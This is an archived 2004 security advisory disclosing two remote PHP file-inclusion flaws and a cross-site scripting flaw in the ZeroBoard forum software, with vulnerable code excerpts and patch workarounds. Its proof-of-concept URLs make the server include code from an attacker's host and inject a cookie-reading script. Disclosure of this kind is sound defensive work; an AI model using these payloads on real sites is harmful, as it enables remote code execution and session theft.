lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
From: advisory at stgsecurity.com (SSR Team)
Subject: STG Security Advisory: [SSA-20041220-16] PHP
	source injection and cross-site scripting vulnerabilities in
	ZeroBoard

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site
scripting vulnerabilities in ZeroBoard

Revision 1.2
Date Published: 2004-12-20 (KST)
Last Update: 2004-12-24
Disclosed by SSR Team (advisory@...security.com)

Summary
=======
ZeroBoard is one of widely used web BBS applications in Korea. . However, an
input validation flaw can cause malicious attackers to run arbitrary
commands with the privilege of the HTTPD process, which is typically run as
the nobody user.


Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
High : arbitrary commands execution.

Affected Products
================
ZeroBoard 4.1pl4 and prior

Vendor Status: NOT FIXED
========================
2004-11-20 Vulnerabilities found.
2004-11-20 1st vendor contact, but they didn't replied.
2004-11-22 2nd vendor contact, but they didn't replied.
2004-12-13 STG Security, Inc. customer notified.
2004-12-24 Official release.

Details
=======
Vulnerability 1 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/

- - - Environment
PHP 5.0.x
php.ini : register_globals = On

- - - Description
As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at
http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path
parameter in outlogin.php can be easily exploited.

- - - Part of vulnerable source, outlogin.php.
- - ----
// ???? ???? ?? ??
if(!file_exists($_zb_path."lib.php")) {
  echo "???? ????? ????";
  return;
}

// _head.php ??
@include $_zb_path."_head.php";

}
- - ----

Vulnerability 2 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/include/write.php?dir=http://[attacker]/


- - - Environment
php.ini: register_globals = On

- - - Reason
Uninitialized $dir variable in write.php


- - - Part of vulnerable source, include/write.php
- - ----
include $dir."/write.php";
- - ----

Vulnerability 3 : Cross-site scripting vulnerability
- - --------------------------------------
- - - Proof of concept
http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</sc
ript>


- - - Reason
check_user_id.php doesn't validate the input value of user_id.

- - - Part of vulnerable source, check_user_id.php
- - ----
$user_id = trim($user_id);
... ?? ...
if($check[0]) echo "$user_id ? ?? ???<br> ??????";
else echo"$user_id ? ????? ????";
... ?? ...
- - ----


Workaround
==========
Without official patches of theses vulnerability, modify the vulnerable
sources as following recommendations.

Vulnerability 1: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 59th line of outlogin.php,

if(eregi(":\/\/",$_zb_path)) $_zb_path="";


Vulnerability 2: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 15th line of include/write.php,

if(eregi(":\/\/",$dir)) $dir="";


Vulnerability 3: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 3rd line of check_user_id.php,

$user_id = htmlspecialchars(trim($user_id));


Credits
======
Jeremy Bae at STG Security

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBQctlEj9dVHd/hpsuEQJffgCg5fzqeXst5usCjWoK5fNV6lruGakAoJtM
awAFdddxTNRwEEy4vyUuxre9
=kiqS
-----END PGP SIGNATURE-----



Powered by blists - more mailing lists